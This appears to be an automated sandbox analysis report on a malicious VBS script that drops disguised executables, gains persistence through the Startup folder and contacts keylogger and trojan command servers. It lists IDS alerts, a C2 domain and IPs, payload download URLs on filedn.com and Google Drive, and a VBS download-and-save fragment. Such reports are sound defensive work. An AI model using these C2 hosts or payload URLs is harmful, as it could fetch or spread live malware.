                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49773 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49775 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49782 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49783 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49808 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49806 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49819 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49820 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49821 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49822 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49825 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49826 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49827 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49828 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49830 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49831 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49846 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49849 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49848 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49867 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49869 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49875 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49876 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49878 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49877 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49885 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49886 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49892 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49899 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49900 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49905 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49906 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49911 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49914 version: TLS 1.2
                            Source: wscript.exe, 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: wscript.exe, 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: wscript.exe, 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CDD92 GetFileAttributesW,FindFirstFileW,FindClose,4_2_004CDD92
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_00502044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00502044
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0050219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0050219F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_005024A9
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,4_2_004F6B3F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,4_2_004F6E4A
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_004FF350
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FFD47 FindFirstFileW,FindClose,4_2_004FFD47
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_004FFDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C92044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00C92044
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C9219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00C9219F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,13_2_00C924A9
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C86B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,13_2_00C86B3F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C86E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,13_2_00C86E4A
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,13_2_00C8F350
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,13_2_00C8FDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C5DD92 GetFileAttributesW,FindFirstFileW,FindClose,13_2_00C5DD92
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8FD47 FindFirstFileW,FindClose,13_2_00C8FD47
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B12044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,32_2_00B12044
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B1219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,32_2_00B1219F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B124A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,32_2_00B124A9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B06B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,32_2_00B06B3F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B06E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,32_2_00B06E4A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,32_2_00B0F350
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ADDD92 GetFileAttributesW,FindFirstFileW,FindClose,32_2_00ADDD92
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,32_2_00B0FDD2
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0FD47 FindFirstFileW,FindClose,32_2_00B0FD47
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: excel.exeMemory has grown: Private usage: 2MB later: 71MB

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49720 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49718 -> 69.42.215.252:80
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49747 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49753 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49755 -> 69.42.215.252:80
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49796 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49837 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49879 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.8:49879
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49729 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49715 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49714 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49721 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49722 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49735 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49734 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49730 -> 142.250.185.78:443
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.109.93.100 443Jump to behavior
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: xred.mooo.com
                            Potential malicious VBS script found (has network functionality)
                            Source: Initial file: .write mpNlrHUj.responseBody
                            Source: Initial file: .savetofile FileName , 2
                            Uses dynamic DNS services
                            Source: unknownDNS query: name: freedns.afraid.org
                            Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                            Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                            Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                            Source: global trafficHTTP traffic detected: GET /lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: filedn.comConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0050550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,4_2_0050550C
                            Source: global trafficHTTP traffic detected: GET /lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: filedn.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
